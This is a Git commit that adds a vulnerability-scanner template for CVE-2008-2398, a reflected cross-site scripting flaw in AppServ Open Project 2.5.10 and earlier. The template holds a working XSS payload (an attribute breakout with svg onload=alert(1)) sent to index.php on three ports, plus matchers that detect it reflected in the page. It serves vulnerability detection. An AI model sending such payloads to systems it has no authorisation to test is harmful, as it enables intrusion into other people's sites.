cve-2008-2398 added

patch-1
shubham chaskar 2020-12-16 01:20:04 +05:30 committed by GitHub
parent 0f774beac8
commit 8c9ce49b2d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

22
cves/CVE-2008-2398.yaml Normal file
View File

@ -0,0 +1,22 @@
id: cve-2008-2398
info:
name: AppServ Open Project 2.5.10 and earlier XSS
author: unstabl3
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}:8181/index.php?appservlang=en%22><svg/onload=alert(1)>"
- "{{BaseURL}}:8081/index.php?appservlang=en%22><svg/onload=alert(1)>"
- "{{BaseURL}}:443/index.php?appservlang=en%22><svg/onload=alert(1)>"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1)>"
part: body